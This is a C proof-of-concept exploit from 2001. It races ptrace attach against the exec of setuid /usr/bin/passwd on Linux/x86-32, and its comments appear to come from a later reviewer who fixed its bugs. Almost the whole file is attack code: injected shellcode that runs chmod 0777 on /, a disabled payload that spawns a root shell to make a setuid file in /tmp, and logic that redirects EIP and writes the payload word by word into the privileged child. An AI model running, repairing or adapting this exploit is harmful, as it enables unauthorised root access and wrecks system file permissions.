/*
 * ptracing the suid for fun and profit
 *
 * 21/03/2001 - tmoggie
 *
 * Proof of concept for a race between ptrace(PTRACE_ATTACH) and the exec of
 * a setuid binary: the parent forks a child that execs /usr/bin/passwd and
 * tries to attach to it and rewrite its text before the kernel has finished
 * turning it into a privileged, untraceable process.  Linux/x86-32 only; the
 * text address it writes to (some_add) is hard-coded from the author's passwd
 * binary and has to be rediscovered for any other target.
 *
 * The exploit DOESN'T WORK yet, so don't blame me for it :P -- it is an
 * example of the race, not a finished exploit.  Run it only on a throwaway
 * machine: the payload it injects does chmod 0777 on /.
 *
 * gcc -Wall -o ptrace_expl ptrace_expl.c
 *
 */
#include <sys/ptrace.h>
#include <sys/procfs.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <asm/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
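/*
 * Payload poked into the traced child.  Linux/x86-32 only; it is plain
 * machine code for chmod("/", 0777):
 *
 *   b8 0f 00 00 00   mov  eax, 15          ; __NR_chmod
 *   68 2f 00 00 2f   push 0x2f00002f       ; "/\0\0/" -> esp points at "/"
 *   89 e3            mov  ebx, esp         ; path
 *   b9 ff 01 00 00   mov  ecx, 0x1ff       ; mode 0777
 *   cd 80            int  0x80
 *
 * Two things a caller must know:
 *  - the bytes contain embedded NULs, so the length has to be carried
 *    separately: strlen() on it returns 2, which is why the original copy
 *    loop wrote only the first word into the child;
 *  - there is no exit() after the syscall, so the child keeps executing
 *    whatever follows the payload at the target address.
 */
static const char shellcode_bytes[] =
"\xb8\x0f\x00\x00\x00\x68\x2f\x00\x00\x2f\x89\xe3\xb9\xff\x01\x00\x00\xcd\x80";
/* Same pointer type as before so existing references keep working. */
char *shellcode = (char *)shellcode_bytes;
/* Payload length in bytes (19), excluding the literal's terminating NUL. */
const size_t shellcode_len = sizeof(shellcode_bytes) - 1;
/*
 * Alternative payload the author left disabled (it appears to be a
 * setuid(0) + execve("/bin/sh", "-c", "chmod 4777 /tmp/xp") sequence).
 * Unused; kept verbatim for reference.
 *
 * "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
 * "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
 * "\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
 * "\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
 * "\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
 * "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
 * "\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
 * "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
 * "\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
 * "\x30"
 * "chmod 4777 /tmp/xp"
 */
/*
 * Address in the child's text segment where the payload is written and where
 * its EIP is pointed.  Presumably taken from the author's /usr/bin/passwd
 * (e.g. via objdump); it is meaningless for any other build of passwd and
 * must be rediscovered per target.
 */
long int some_add = 0x08048bc8;

/*
 * Print the first two lines of /proc/<pid>/status (on the author's kernel
 * "Name:" and "State:") so the child's state can be followed across the
 * attach / poke / detach sequence.  Diagnostic only: on any failure it
 * reports the error and returns without printing the status block.
 *
 * NOTE(review): the name shadows stat(2) from <sys/stat.h>.  It is kept
 * because the rest of this file calls it by this name; do not include
 * <sys/stat.h> in this translation unit.
 */
void
stat(int pid)
{
	char path[64];
	char buf[1024];
	int fd;
	ssize_t n;
	size_t i, newlines;

	snprintf(path, sizeof path, "/proc/%d/status", pid);
	fd = open(path, O_RDONLY);
	printf("open : %d\n", fd);
	if (fd < 0) {
		printf("status: open: %s\n", strerror(errno));
		return;
	}
	/* Leave one byte for the terminator; the original read a full buffer
	 * and then scanned it unterminated. */
	n = read(fd, buf, sizeof buf - 1);
	close(fd);
	if (n < 0) {
		printf("status: read: %s\n", strerror(errno));
		return;
	}
	buf[n] = '\0';

	/* Cut the text after its second newline.  The scan is bounded by n, so
	 * a short read, a failed open or a status file with fewer than two
	 * lines can no longer walk past the end of the buffer. */
	newlines = 0;
	for (i = 0; i < (size_t)n; i++) {
		if (buf[i] == '\n' && ++newlines == 2) {
			buf[i] = '\0';
			break;
		}
	}
	printf("==================== status ============\n%s\n", buf);
	printf("****************************************\n");
}

/*
 * Entry point.
 *
 * Run with no arguments it first reads every file under /usr/bin (a crude way
 * of pushing other files out of the page cache) and then re-execs itself with
 * a marker argument.  Run with an argument it forks: the child execs the
 * setuid /usr/bin/passwd; the parent attaches with PTRACE_ATTACH, points the
 * child's EIP at some_add, writes the payload there word by word and
 * detaches.  Which side of the attach/exec race wins depends on timing, which
 * is what the cold cache is for.
 *
 * Returns 0 after detaching; exits -1 on any failure that makes the remaining
 * steps meaningless.  Every ptrace/open/mmap/waitpid result is now checked;
 * the original ignored most of them and carried on with garbage.
 */
int main(int argc, char **argv)
{
	pid_t pid;
	int rc, status;
	void *p;
	struct pt_regs regs;
	size_t off;

	if (argc == 1) {
		printf("[+] cleaning disk cache, pleas be patient...");
		fflush(stdout);
		/* Fixed command string; nothing user-controlled is interpolated. */
		system("cat /usr/bin/* >/dev/null 2>&1");
		printf(" [done]\n[+] starting main code\n");
		/* The argv terminator must be a null pointer, not int 0: execl is
		 * variadic and reads it as char *. */
		execl(argv[0], argv[0], "daj-mi-qrfa-roota", (char *)NULL);
		/* execl returns only on failure.  The original fell through to
		 * the race in that case; keep that behaviour but say so. */
		printf("[-] re-exec of %s failed: %s\n", argv[0], strerror(errno));
	}

	pid = fork();
	if (pid < 0) {
		printf("fork: %s\n", strerror(errno));
		exit(-1);
	}
	if (pid == 0) {
		/* argv[0] points into a private mapping of a file that the cache
		 * warm-up above should have evicted, so execve has to fault it in
		 * from disk while copying the argument strings.  Presumably that
		 * is meant to widen the window for the parent's attach -- TODO
		 * confirm; the author's notes only say the exploit is unfinished.
		 * The kernel reads argv[0] up to its first NUL; the 100 KiB
		 * mapping length is just an upper bound. */
		int fd = open("/etc/lilo.conf", O_RDONLY);
		if (fd < 0) {
			printf("C open /etc/lilo.conf: %s\n", strerror(errno));
			exit(-1);
		}
		p = mmap(0, 102400, PROT_READ, MAP_PRIVATE, fd, 0);
		if (p == MAP_FAILED) {
			printf("C mmap: %s\n", strerror(errno));
			exit(-1);
		}
		printf("Child exec\n");
		execl("/usr/bin/passwd", (char *)p, (char *)NULL);
		printf("C aiaiai: %s\n", strerror(errno));
		exit(-1);
	}

	stat(pid);
	rc = ptrace(PTRACE_ATTACH, pid, 0, 0);
	printf("P ATT: %d : %s\n", rc, strerror(errno));
	if (rc != 0) {
		printf("P ATT: failed: %s\n", strerror(errno));
		exit(-1);
	}
	/* Attach delivers SIGSTOP; registers and memory may only be touched
	 * once the child has actually stopped.  The original ignored waitpid. */
	if (waitpid(pid, &status, 0) < 0) {
		printf("[-] waitpid: %s\n", strerror(errno));
		exit(-1);
	}
	if (!WIFSTOPPED(status)) {
		printf("[-] child did not stop after attach (status 0x%x)\n", status);
		exit(-1);
	}
	rc = ptrace(PTRACE_GETREGS, pid, &regs, 0);
	printf("PTRACE_GETREGS returned: %d : %s\n", rc, strerror(errno));
	stat(pid);

	/* Redirect the child's EIP to some_add, the address the payload is
	 * written to below.  The original poked the value of `shellcode` here,
	 * a pointer valid in this process but not in the child, so the child
	 * would have resumed somewhere unrelated to the payload (the disabled
	 * PTRACE_SETREGS variant the author left behind set eip = some_add,
	 * which is the consistent choice).  4*EIP is the byte offset of eip in
	 * the i386 user area, which is what PTRACE_POKEUSER addresses. */
	rc = ptrace(PTRACE_POKEUSER, pid, (void *)(long)(4 * EIP), (void *)some_add);
	if (rc != 0)
		fprintf(stderr, "err. ERROR ptrace_pokeuser: %s\n", strerror(errno));
	stat(pid);

	printf("[+] copy shellcode (%lu bytes) from P:%p to C:0x%8.8lx\n[",
	       (unsigned long)shellcode_len, (void *)shellcode, some_add);
	/* PTRACE_POKETEXT writes one word at a time.  The payload contains
	 * embedded NULs, so it is measured by shellcode_len rather than
	 * strlen(); a partial final word is zero-padded instead of being read
	 * past the end of the array. */
	for (off = 0; off < shellcode_len; off += sizeof(long)) {
		long word = 0;
		size_t chunk = shellcode_len - off;

		if (chunk > sizeof word)
			chunk = sizeof word;
		memcpy(&word, shellcode + off, chunk);
		rc = ptrace(PTRACE_POKETEXT, pid, (void *)(some_add + off), (void *)word);
		printf(".");
		if (rc != 0) {
			printf("\n[-] PTRACE_POKETEXT returned: %d : %s\n", rc, strerror(errno));
			printf("exiting\n");
			exit(-1);
		}
	}
	printf("]\n");
	stat(pid);

	rc = ptrace(PTRACE_DETACH, pid, 0, 0);
	if (rc != 0)
		printf("[-] PTRACE_DETACH returned: %d : %s\n", rc, strerror(errno));
	stat(pid);
	return 0;
}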